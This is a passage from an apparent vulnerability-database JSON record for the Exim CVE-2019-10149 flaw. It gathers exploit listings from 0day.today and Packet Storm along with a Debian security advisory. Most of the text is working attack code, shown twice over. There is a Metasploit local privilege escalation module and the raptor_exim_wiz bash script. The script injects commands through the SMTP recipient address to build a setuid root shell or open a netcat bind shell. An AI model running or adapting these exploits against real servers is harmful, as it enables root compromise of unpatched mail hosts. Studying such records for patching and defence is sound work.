\"local_part_suffix = +* : -*\" for example),\r\n then a remote attacker can simply reuse our local-exploitation method\r\n with an RCPT TO \"balrog+${run{...}}@localhost\" (where \"balrog\" is the\r\n name of a local user).\r\n\r\n- If Exim was configured to relay mail to a remote domain, as a\r\n secondary MX (Mail eXchange), then a remote attacker can simply reuse\r\n our local-exploitation method with an RCPT TO \"${run{...}}@khazad.dum\"\r\n (where \"khazad.dum\" is one of Exim's relay_to_domains). Indeed, the\r\n \"verify = recipient\" ACL can only check the domain part of a remote\r\n address (the part that follows the @ sign), not the local part.\r\n\r\n------------------------------------------------------------------------\r\nDefault configuration\r\n------------------------------------------------------------------------\r\n\r\n[...]\r\n\r\n\r\n========================================================================\r\nAcknowledgments\r\n========================================================================\r\n\r\nWe thank Exim's developers, Solar Designer, and the members of\r\n[email\u00a0protected]\r\n\r\n\"The Return of the WIZard\" is a reference to Sendmail's ancient WIZ and\r\nDEBUG vulnerabilities:\r\n\r\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0145\r\nhttps://seclists.org/bugtraq/1995/Feb/56\r\n\r\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0095\r\nhttp://www.cheswick.com/ches/papers/berferd.pdf\r\n\r\n\r\n========================================================================\r\nTimeline\r\n========================================================================\r\n\r\n2019-05-27: Advisory sent to [email\u00a0protected]\r\n\r\n2019-05-28: Advisory sent to [email\u00a0protected]\n\n# 0day.today [2019-06-09] #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/32848"}, {"lastseen": "2019-12-04T03:56:25", "description": "This Metasploit module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to command execution with root privileges.", "edition": 1, "published": "2019-08-24T00:00:00", "title": "Exim 4.87 / 4.91 - Local Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-10149"], "modified": "2019-08-24T00:00:00", "id": "1337DAY-ID-33150", "href": "https://0day.today/exploit/description/33150", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'expect'\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::FileDropper\r\n include Msf::Post::File\r\n include Msf::Post::Linux::Priv\r\n include Msf::Post::Linux::System\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Exim 4.87 - 4.91 Local Privilege Escalation',\r\n 'Description' => %q{\r\n This module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive).\r\n Improper validation of recipient address in deliver_message()\r\n function in /src/deliver.c may lead to command execution with root privileges\r\n (CVE-2019-10149).\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Qualys', # Discovery and PoC (@qualys)\r\n 'Dennis Herrmann', # Working exploit (@dhn)\r\n 'Marco Ivaldi', # Working exploit (@0xdea)\r\n 'Guillaume Andr\u00e9' # Metasploit module (@yaumn_)\r\n ],\r\n 'DisclosureDate' => '2019-06-05',\r\n 'Platform' => [ 'linux' ],\r\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' =>\r\n [\r\n [\r\n 'Exim 4.87 - 4.91',\r\n lower_version: Gem::Version.new('4.87'),\r\n upper_version: Gem::Version.new('4.91')\r\n ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'PrependSetgid' => true,\r\n 'PrependSetuid' => true\r\n },\r\n 'References' =>\r\n [\r\n [ 'CVE', '2019-10149' ],\r\n [ 'EDB', '46996' ],\r\n [ 'URL', 'https://www.openwall.com/lists/oss-security/2019/06/06/1' ]\r\n ]\r\n ))\r\n\r\n register_options(\r\n [\r\n OptInt.new('EXIMPORT', [ true, 'The port exim is listening to', 25 ])\r\n ])\r\n\r\n register_advanced_options(\r\n [\r\n OptBool.new('ForceExploit', [ false, 'Force exploit even if the current session is root', false ]),\r\n OptFloat.new('SendExpectTimeout', [ true, 'Timeout per send/expect when communicating with exim', 3.5 ]),\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\r\n ])\r\n end\r\n\r\n def base_dir\r\n datastore['WritableDir'].to_s\r\n end\r\n\r\n def encode_command(cmd)\r\n '\\x' + cmd.unpack('H2' * cmd.length).join('\\x')\r\n end\r\n\r\n def open_tcp_connection\r\n socket_subsystem = Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket.new(client)\r\n params = Rex::Socket::Parameters.new({\r\n 'PeerHost' => '127.0.0.1',\r\n 'PeerPort' => datastore['EXIMPORT']\r\n })\r\n begin\r\n socket = socket_subsystem.create_tcp_client_channel(params)\r\n rescue => e\r\n vprint_error(\"Couldn't connect to port #{datastore['EXIMPORT']}, \"\\\r\n \"are you sure exim is listening on this port? (see EXIMPORT)\")\r\n raise e\r\n end\r\n return socket_subsystem, socket\r\n end\r\n\r\n def inject_payload(payload)\r\n if session.type == 'meterpreter'\r\n socket_subsystem, socket = open_tcp_connection\r\n\r\n tcp_conversation = {\r\n nil => /220/,\r\n 'helo localhost' => /250/,\r\n \"MAIL FROM:<>\" => /250/,\r\n \"RCPT TO:<${run{#{payload}}}@localhost>\" => /250/,\r\n 'DATA' => /354/,\r\n 'Received:' => nil,\r\n '.' => /250/\r\n }\r\n\r\n begin\r\n tcp_conversation.each do |line, pattern|\r\n Timeout.timeout(datastore['SendExpectTimeout']) do\r\n if line\r\n if line == 'Received:'\r\n for i in (1..31)\r\n socket.puts(\"#{line} #{i}\\n\")\r\n end\r\n else\r\n socket.puts(\"#{line}\\n\")\r\n end\r\n end\r\n if pattern\r\n socket.expect(pattern)\r\n end\r\n end\r\n end\r\n rescue Rex::ConnectionError => e\r\n fail_with(Failure::Unreachable, e.message)\r\n rescue Timeout::Error\r\n fail_with(Failure::TimeoutExpired, 'SendExpectTimeout maxed out')\r\n ensure\r\n socket.puts(\"QUIT\\n\")\r\n socket.close\r\n socket_subsystem.shutdown\r\n end\r\n else\r\n unless cmd_exec(\"/bin/bash -c 'exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}' \"\\\r\n \"&& echo true\").chomp.to_s == 'true'\r\n fail_with(Failure::NotFound, \"Port #{datastore['EXIMPORT']} is closed\")\r\n end\r\n\r\n bash_script = %|\r\n #!/bin/bash\r\n\r\n exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}\r\n read -u 3 && echo $REPLY\r\n echo \"helo localhost\" >&3\r\n read -u 3 && echo $REPLY\r\n echo \"mail from:<>\" >&3\r\n read -u 3 && echo $REPLY\r\n echo 'rcpt to:<${run{#{payload}}}@localhost>' >&3\r\n read -u 3 && echo $REPLY\r\n echo \"data\" >&3\r\n read -u 3 && echo $REPLY\r\n for i in $(seq 1 30); do\r\n echo 'Received: $i' >&3\r\n done\r\n echo \".\" >&3\r\n read -u 3 && echo $REPLY\r\n echo \"quit\" >&3\r\n read -u 3 && echo $REPLY\r\n |\r\n\r\n @bash_script_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))\r\n write_file(@bash_script_path, bash_script)\r\n register_file_for_cleanup(@bash_script_path)\r\n chmod(@bash_script_path)\r\n cmd_exec(\"/bin/bash -c \\\"#{@bash_script_path}\\\"\")\r\n end\r\n\r\n print_status('Payload sent, wait a few seconds...')\r\n Rex.sleep(5)\r\n end\r\n\r\n def check_for_bash\r\n unless command_exists?('/bin/bash')\r\n fail_with(Failure::NotFound, 'bash not found')\r\n end\r\n end\r\n\r\n def on_new_session(session)\r\n super\r\n\r\n if session.type == 'meterpreter'\r\n session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')\r\n session.fs.file.rm(@payload_path)\r\n else\r\n session.shell_command_token(\"rm -f #{@payload_path}\")\r\n end\r\n end\r\n\r\n def check\r\n if session.type == 'meterpreter'\r\n begin\r\n socket_subsystem, socket = open_tcp_connection\r\n rescue\r\n return CheckCode::Safe\r\n end\r\n res = socket.gets\r\n socket.close\r\n socket_subsystem.shutdown\r\n else\r\n check_for_bash\r\n res = cmd_exec(\"/bin/bash -c 'exec 3</dev/tcp/localhost/#{datastore['EXIMPORT']} && \"\\\r\n \"(read -u 3 && echo $REPLY) || echo false'\")\r\n if res == 'false'\r\n vprint_error(\"Couldn't connect to port #{datastore['EXIMPORT']}, \"\\\r\n \"are you sure exim is listening on this port? (see EXIMPORT)\")\r\n return CheckCode::Safe\r\n end\r\n end\r\n\r\n if res =~ /Exim ([0-9\\.]+)/i\r\n version = Gem::Version.new($1)\r\n vprint_status(\"Found exim version: #{version}\")\r\n if version >= target[:lower_version] && version <= target[:upper_version]\r\n return CheckCode::Appears\r\n else\r\n return CheckCode::Safe\r\n end\r\n end\r\n\r\n CheckCode::Unknown\r\n end\r\n\r\n def exploit\r\n if is_root?\r\n unless datastore['ForceExploit']\r\n fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')\r\n end\r\n end\r\n\r\n unless writable?(base_dir)\r\n fail_with(Failure::BadConfig, \"#{base_dir} is not writable\")\r\n end\r\n\r\n if nosuid?(base_dir)\r\n fail_with(Failure::BadConfig, \"#{base_dir} is mounted nosuid\")\r\n end\r\n\r\n unless datastore['PrependSetuid'] && datastore['PrependSetgid']\r\n fail_with(Failure::BadConfig, 'PrependSetuid and PrependSetgid must both be set to true in order ' \\\r\n 'to get root privileges.')\r\n end\r\n\r\n if session.type == 'shell'\r\n check_for_bash\r\n end\r\n\r\n @payload_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))\r\n write_file(@payload_path, payload.encoded_exe)\r\n register_file_for_cleanup(@payload_path)\r\n inject_payload(encode_command(\"/bin/sh -c 'chown root #{@payload_path};\"\\\r\n \"chmod 4755 #{@payload_path}'\"))\r\n\r\n unless setuid?(@payload_path)\r\n fail_with(Failure::Unknown, \"Couldn't escalate privileges\")\r\n end\r\n\r\n cmd_exec(\"#{@payload_path} & echo \")\r\n end\r\nend\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/33150"}, {"lastseen": "2019-06-18T13:57:26", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2019-06-17T00:00:00", "title": "Exim 4.91 Local Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-10149"], "modified": "2019-06-17T00:00:00", "id": "1337DAY-ID-32869", "href": "https://0day.today/exploit/description/32869", "sourceData": "#!/bin/bash\r\n\r\n#\r\n# raptor_exim_wiz - \"The Return of the WIZard\" LPE exploit\r\n# Copyright (c) 2019 Marco Ivaldi <[email\u00a0protected]>\r\n#\r\n# A flaw was found in Exim versions 4.87 to 4.91 (inclusive). \r\n# Improper validation of recipient address in deliver_message() \r\n# function in /src/deliver.c may lead to remote command execution.\r\n# (CVE-2019-10149)\r\n#\r\n# This is a local privilege escalation exploit for \"The Return \r\n# of the WIZard\" vulnerability reported by the Qualys Security \r\n# Advisory team.\r\n#\r\n# Credits:\r\n# Qualys Security Advisory team (kudos for your amazing research!)\r\n# Dennis 'dhn' Herrmann (/dev/tcp technique)\r\n#\r\n# Usage (setuid method):\r\n# $ id\r\n# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]\r\n# $ ./raptor_exim_wiz -m setuid\r\n# Preparing setuid shell helper...\r\n# Delivering setuid payload...\r\n# [...]\r\n# Waiting 5 seconds...\r\n# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned\r\n# # id\r\n# uid=0(root) gid=0(root) groups=0(root)\r\n#\r\n# Usage (netcat method):\r\n# $ id\r\n# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]\r\n# $ ./raptor_exim_wiz -m netcat\r\n# Delivering netcat payload...\r\n# Waiting 5 seconds...\r\n# localhost [127.0.0.1] 31337 (?) open\r\n# id\r\n# uid=0(root) gid=0(root) groups=0(root)\r\n#\r\n# Vulnerable platforms:\r\n# Exim 4.87 - 4.91\r\n#\r\n# Tested against:\r\n# Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz]\r\n#\r\n\r\nMETHOD=\"setuid\" # default method\r\nPAYLOAD_SETUID='${run{\\x2fbin\\x2fsh\\t-c\\t\\x22chown\\troot\\t\\x2ftmp\\x2fpwned\\x3bchmod\\t4755\\t\\x2ftmp\\x2fpwned\\x22}}@localhost'\r\nPAYLOAD_NETCAT='${run{\\x2fbin\\x2fsh\\t-c\\t\\x22nc\\t-lp\\t31337\\t-e\\t\\x2fbin\\x2fsh\\x22}}@localhost'\r\n\r\n# usage instructions\r\nfunction usage()\r\n{\r\n echo \"$0 [-m METHOD]\"\r\n echo\r\n echo \"-m setuid : use the setuid payload (default)\"\r\n echo \"-m netcat : use the netcat payload\"\r\n echo\r\n exit 1\r\n}\r\n\r\n# payload delivery\r\nfunction exploit()\r\n{\r\n # connect to localhost:25\r\n exec 3<>/dev/tcp/localhost/25\r\n\r\n # deliver the payload\r\n read -u 3 && echo $REPLY\r\n echo \"helo localhost\" >&3\r\n read -u 3 && echo $REPLY\r\n echo \"mail from:<>\" >&3\r\n read -u 3 && echo $REPLY\r\n echo \"rcpt to:<$PAYLOAD>\" >&3\r\n read -u 3 && echo $REPLY\r\n echo \"data\" >&3\r\n read -u 3 && echo $REPLY\r\n for i in {1..31}\r\n do\r\n echo \"Received: $i\" >&3\r\n done\r\n echo \".\" >&3\r\n read -u 3 && echo $REPLY\r\n echo \"quit\" >&3\r\n read -u 3 && echo $REPLY\r\n}\r\n\r\n# print banner\r\necho\r\necho 'raptor_exim_wiz - \"The Return of the WIZard\" LPE exploit'\r\necho 'Copyright (c) 2019 Marco Ivaldi <[email\u00a0protected]>'\r\necho\r\n\r\n# parse command line\r\nwhile [ ! -z \"$1\" ]; do\r\n case $1 in\r\n -m) shift; METHOD=\"$1\"; shift;;\r\n * ) usage\r\n ;;\r\n esac\r\ndone\r\nif [ -z $METHOD ]; then\r\n usage\r\nfi\r\n\r\n# setuid method\r\nif [ $METHOD = \"setuid\" ]; then\r\n\r\n # prepare a setuid shell helper to circumvent bash checks\r\n echo \"Preparing setuid shell helper...\"\r\n echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" >/tmp/pwned.c\r\n gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null\r\n if [ $? -ne 0 ]; then\r\n echo \"Problems compiling setuid shell helper, check your gcc.\"\r\n echo \"Falling back to the /bin/sh method.\"\r\n cp /bin/sh /tmp/pwned\r\n fi\r\n echo\r\n\r\n # select and deliver the payload\r\n echo \"Delivering $METHOD payload...\"\r\n PAYLOAD=$PAYLOAD_SETUID\r\n exploit\r\n echo\r\n\r\n # wait for the magic to happen and spawn our shell\r\n echo \"Waiting 5 seconds...\"\r\n sleep 5\r\n ls -l /tmp/pwned\r\n /tmp/pwned\r\n\r\n# netcat method\r\nelif [ $METHOD = \"netcat\" ]; then\r\n\r\n # select and deliver the payload\r\n echo \"Delivering $METHOD payload...\"\r\n PAYLOAD=$PAYLOAD_NETCAT\r\n exploit\r\n echo\r\n\r\n # wait for the magic to happen and spawn our shell\r\n echo \"Waiting 5 seconds...\"\r\n sleep 5\r\n nc -v 127.0.0.1 31337\r\n\r\n# print help\r\nelse\r\n usage\r\nfi\n\n# 0day.today [2019-06-18] #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/32869"}], "debian": [{"lastseen": "2020-08-12T00:51:19", "bulletinFamily": "unix", "cvelist": ["CVE-2019-10149"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4456-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nJune 05, 2019 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : exim4\nCVE ID : CVE-2019-10149\n\nThe Qualys Research Labs reported a flaw in Exim, a mail transport\nagent. Improper validation of the recipient address in the\ndeliver_message() function may result in the execution of arbitrary\ncommands.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 4.89-2+deb9u4.\n\nWe recommend that you upgrade your exim4 packages.\n\nFor the detailed security status of exim4 please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/exim4\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 8, "modified": "2019-06-05T15:35:18", "published": "2019-06-05T15:35:18", "id": "DEBIAN:DSA-4456-1:5D64B", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2019/msg00101.html", "title": "[SECURITY] [DSA 4456-1] exim4 security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2019-06-18T11:49:32", "description": "", "published": "2019-06-17T00:00:00", "type": "packetstorm", "title": "Exim 4.91 Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-10149"], "modified": "2019-06-17T00:00:00", "id": "PACKETSTORM:153312", "href": "https://packetstormsecurity.com/files/153312/Exim-4.91-Local-Privilege-Escalation.html", "sourceData": "`#!/bin/bash \n \n# \n# raptor_exim_wiz - \"The Return of the WIZard\" LPE exploit \n# Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info> \n# \n# A flaw was found in Exim versions 4.87 to 4.91 (inclusive). \n# Improper validation of recipient address in deliver_message() \n# function in /src/deliver.c may lead to remote command execution. \n# (CVE-2019-10149) \n# \n# This is a local privilege escalation exploit for \"The Return \n# of the WIZard\" vulnerability reported by the Qualys Security \n# Advisory team. \n# \n# Credits: \n# Qualys Security Advisory team (kudos for your amazing research!) \n# Dennis 'dhn' Herrmann (/dev/tcp technique) \n# \n# Usage (setuid method): \n# $ id \n# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...] \n# $ ./raptor_exim_wiz -m setuid \n# Preparing setuid shell helper... \n# Delivering setuid payload... \n# [...] \n# Waiting 5 seconds... \n# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned \n# # id \n# uid=0(root) gid=0(root) groups=0(root) \n# \n# Usage (netcat method): \n# $ id \n# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...] \n# $ ./raptor_exim_wiz -m netcat \n# Delivering netcat payload... \n# Waiting 5 seconds... \n# localhost [127.0.0.1] 31337 (?) open \n# id \n# uid=0(root) gid=0(root) groups=0(root) \n# \n# Vulnerable platforms: \n# Exim 4.87 - 4.91 \n# \n# Tested against: \n# Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz] \n# \n \nMETHOD=\"setuid\" # default method \nPAYLOAD_SETUID='${run{\\x2fbin\\x2fsh\\t-c\\t\\x22chown\\troot\\t\\x2ftmp\\x2fpwned\\x3bchmod\\t4755\\t\\x2ftmp\\x2fpwned\\x22}}@localhost' \nPAYLOAD_NETCAT='${run{\\x2fbin\\x2fsh\\t-c\\t\\x22nc\\t-lp\\t31337\\t-e\\t\\x2fbin\\x2fsh\\x22}}@localhost' \n \n# usage instructions \nfunction usage() \n{ \necho \"$0 [-m METHOD]\" \necho \necho \"-m setuid : use the setuid payload (default)\" \necho \"-m netcat : use the netcat payload\" \necho \nexit 1 \n} \n \n# payload delivery \nfunction exploit() \n{ \n# connect to localhost:25 \nexec 3<>/dev/tcp/localhost/25 \n \n# deliver the payload \nread -u 3 && echo $REPLY \necho \"helo localhost\" >&3 \nread -u 3 && echo $REPLY \necho \"mail from:<>\" >&3 \nread -u 3 && echo $REPLY \necho \"rcpt to:<$PAYLOAD>\" >&3 \nread -u 3 && echo $REPLY \necho \"data\" >&3 \nread -u 3 && echo $REPLY \nfor i in {1..31} \ndo \necho \"Received: $i\" >&3 \ndone \necho \".\" >&3 \nread -u 3 && echo $REPLY \necho \"quit\" >&3 \nread -u 3 && echo $REPLY \n} \n \n# print banner \necho \necho 'raptor_exim_wiz - \"The Return of the WIZard\" LPE exploit' \necho 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>' \necho \n \n# parse command line \nwhile [ ! -z \"$1\" ]; do \ncase $1 in \n-m) shift; METHOD=\"$1\"; shift;; \n* ) usage \n;; \nesac \ndone \nif [ -z $METHOD ]; then \nusage \nfi \n \n# setuid method \nif [ $METHOD = \"setuid\" ]; then \n \n# prepare a setuid shell helper to circumvent bash checks \necho \"Preparing setuid shell helper...\" \necho \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" >/tmp/pwned.c \ngcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null \nif [ $? -ne 0 ]; then \necho \"Problems compiling setuid shell helper, check your gcc.\" \necho \"Falling back to the /bin/sh method.\" \ncp /bin/sh /tmp/pwned \nfi \necho \n \n# select and deliver the payload \necho \"Delivering $METHOD payload...\" \nPAYLOAD=$PAYLOAD_SETUID \nexploit \necho \n \n# wait for the magic to happen and spawn our shell \necho \"Waiting 5 seconds...\" \nsleep 5 \nls -l /tmp/pwned \n/tmp/pwned \n \n# netcat method \nelif [ $METHOD = \"netcat\" ]; then \n \n# select and deliver the payload \necho \"Delivering $METHOD payload...\" \nPAYLOAD=$PAYLOAD_NETCAT \nexploit \necho \n \n# wait for the magic to happen and spawn our shell \necho \"Waiting 5 seconds...\" \nsleep 5 \nnc -v 127.0.0.1 31337 \n \n# print help \nelse \nusage \nfi \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/153312/raptor_exim_wiz.sh.txt"}, {"lastseen": "2019-08-24T22:40:27", "description": "", "published": "2019-08-23T00:00:00", "type": "packetstorm", "title": "Exim 4.91 Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-10149"], "modified": "2019-08-23T00:00:00", "id": "PACKETSTORM:154198", "href": "https://packetstormsecurity.com/files/154198/Exim-4.91-Local-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'expect' \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ExcellentRanking \n \ninclude Msf::Exploit::FileDropper \ninclude Msf::Post::File \ninclude Msf::Post::Linux::Priv \ninclude Msf::Post::Linux::System \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Exim 4.87 - 4.91 Local Privilege Escalation', \n'Description' => %q{ \nThis module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive). \nImproper validation of recipient address in deliver_message() \nfunction in /src/deliver.c may lead to command execution with root privileges \n(CVE-2019-10149). \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Qualys', # Discovery and PoC (@qualys) \n'Dennis Herrmann', # Working exploit (@dhn) \n'Marco Ivaldi', # Working exploit (@0xdea) \n'Guillaume Andr\u00e9' # Metasploit module (@yaumn_) \n], \n'DisclosureDate' => '2019-06-05', \n'Platform' => [ 'linux' ], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'SessionTypes' => [ 'shell', 'meterpreter' ], \n'Targets' => \n[ \n[ \n'Exim 4.87 - 4.91', \nlower_version: Gem::Version.new('4.87'), \nupper_version: Gem::Version.new('4.91') \n] \n], \n'DefaultOptions' => \n{ \n'PrependSetgid' => true, \n'PrependSetuid' => true \n}, \n'References' => \n[ \n[ 'CVE', '2019-10149' ], \n[ 'EDB', '46996' ], \n[ 'URL', 'https://www.openwall.com/lists/oss-security/2019/06/06/1' ] \n] \n)) \n \nregister_options( \n[ \nOptInt.new('EXIMPORT', [ true, 'The port exim is listening to', 25 ]) \n]) \n \nregister_advanced_options( \n[ \nOptBool.new('ForceExploit', [ false, 'Force exploit even if the current session is root', false ]), \nOptFloat.new('SendExpectTimeout', [ true, 'Timeout per send/expect when communicating with exim', 3.5 ]), \nOptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) \n]) \nend \n \ndef base_dir \ndatastore['WritableDir'].to_s \nend \n \ndef encode_command(cmd) \n'\\x' + cmd.unpack('H2' * cmd.length).join('\\x') \nend \n \ndef open_tcp_connection \nsocket_subsystem = Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket.new(client) \nparams = Rex::Socket::Parameters.new({ \n'PeerHost' => '127.0.0.1', \n'PeerPort' => datastore['EXIMPORT'] \n}) \nbegin \nsocket = socket_subsystem.create_tcp_client_channel(params) \nrescue => e \nvprint_error(\"Couldn't connect to port #{datastore['EXIMPORT']}, \"\\ \n\"are you sure exim is listening on this port? (see EXIMPORT)\") \nraise e \nend \nreturn socket_subsystem, socket \nend \n \ndef inject_payload(payload) \nif session.type == 'meterpreter' \nsocket_subsystem, socket = open_tcp_connection \n \ntcp_conversation = { \nnil => /220/, \n'helo localhost' => /250/, \n\"MAIL FROM:<>\" => /250/, \n\"RCPT TO:<${run{#{payload}}}@localhost>\" => /250/, \n'DATA' => /354/, \n'Received:' => nil, \n'.' => /250/ \n} \n \nbegin \ntcp_conversation.each do |line, pattern| \nTimeout.timeout(datastore['SendExpectTimeout']) do \nif line \nif line == 'Received:' \nfor i in (1..31) \nsocket.puts(\"#{line} #{i}\\n\") \nend \nelse \nsocket.puts(\"#{line}\\n\") \nend \nend \nif pattern \nsocket.expect(pattern) \nend \nend \nend \nrescue Rex::ConnectionError => e \nfail_with(Failure::Unreachable, e.message) \nrescue Timeout::Error \nfail_with(Failure::TimeoutExpired, 'SendExpectTimeout maxed out') \nensure \nsocket.puts(\"QUIT\\n\") \nsocket.close \nsocket_subsystem.shutdown \nend \nelse \nunless cmd_exec(\"/bin/bash -c 'exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}' \"\\ \n\"&& echo true\").chomp.to_s == 'true' \nfail_with(Failure::NotFound, \"Port #{datastore['EXIMPORT']} is closed\") \nend \n \nbash_script = %| \n#!/bin/bash \n \nexec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']} \nread -u 3 && echo $REPLY \necho \"helo localhost\" >&3 \nread -u 3 && echo $REPLY \necho \"mail from:<>\" >&3 \nread -u 3 && echo $REPLY \necho 'rcpt to:<${run{#{payload}}}@localhost>' >&3 \nread -u 3 && echo $REPLY \necho \"data\" >&3 \nread -u 3 && echo $REPLY \nfor i in $(seq 1 30); do \necho 'Received: $i' >&3 \ndone \necho \".\" >&3 \nread -u 3 && echo $REPLY \necho \"quit\" >&3 \nread -u 3 && echo $REPLY \n| \n \n@bash_script_path = File.join(base_dir, Rex::Text.rand_text_alpha(10)) \nwrite_file(@bash_script_path, bash_script) \nregister_file_for_cleanup(@bash_script_path) \nchmod(@bash_script_path) \ncmd_exec(\"/bin/bash -c \\\"#{@bash_script_path}\\\"\") \nend \n \nprint_status('Payload sent, wait a few seconds...') \nRex.sleep(5) \nend \n \ndef check_for_bash \nunless command_exists?('/bin/bash') \nfail_with(Failure::NotFound, 'bash not found') \nend \nend \n \ndef on_new_session(session) \nsuper \n \nif session.type == 'meterpreter' \nsession.core.use('stdapi') unless session.ext.aliases.include?('stdapi') \nsession.fs.file.rm(@payload_path) \nelse \nsession.shell_command_token(\"rm -f #{@payload_path}\") \nend \nend \n \ndef check \nif session.type == 'meterpreter' \nbegin \nsocket_subsystem, socket = open_tcp_connection \nrescue \nreturn CheckCode::Safe \nend \nres = socket.gets \nsocket.close \nsocket_subsystem.shutdown \nelse \ncheck_for_bash \nres = cmd_exec(\"/bin/bash -c 'exec 3</dev/tcp/localhost/#{datastore['EXIMPORT']} && \"\\ \n\"(read -u 3 && echo $REPLY) || echo false'\") \nif res == 'false' \nvprint_error(\"Couldn't connect to port #{datastore['EXIMPORT']}, \"\\ \n\"are you sure exim is listening on this port? (see EXIMPORT)\") \nreturn CheckCode::Safe \nend \nend \n \nif res =~ /Exim ([0-9\\.]+)/i \nversion = Gem::Version.new($1) \nvprint_status(\"Found exim version: #{version}\") \nif version >= target[:lower_version] && version <= target[:upper_version] \nreturn CheckCode::Appears \nelse \nreturn CheckCode::Safe \nend \nend \n \nCheckCode::Unknown \nend \n \ndef exploit \nif is_root? \nunless datastore['ForceExploit'] \nfail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.') \nend \nend \n \nunless writable?(base_dir) \nfail_with(Failure::BadConfig, \"#{base_dir} is not writable\") \nend \n \nif nosuid?(base_dir) \nfail_with(Failure::BadConfig, \"#{base_dir} is mounted nosuid\") \nend \n \nunless datastore['PrependSetuid'] && datastore['PrependSetgid'] \nfail_with(Failure::BadConfig, 'PrependSetuid and PrependSetgid must both be set to true in order ' \\ \n'to get root privileges.') \nend \n \nif session.type == 'shell' \ncheck_for_bash \nend \n \n@payload_path = File.join(base_dir, Rex::Text.rand_text_alpha(10)) \nwrite_file(@payload_path, payload.encoded_exe) \nregister_file_for_cleanup(@payload_path) \ninject_payload(encode_command(\"/bin/sh -c 'chown root #{@payload_path};\"\\ \n\"chmod 4755 #{@payload_path}'\")) \n \nunless setuid?(@payload_path) \nfail_with(Failure::Unknown, \"Couldn't escalate privileges\") \nend \n \ncmd_exec(\"#{@payload_path} & echo \") \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/154198/exim4_deliver_message_priv_esc.rb.txt"}], "cisa": [{"lastseen": "2021-02-24T18:06:47", 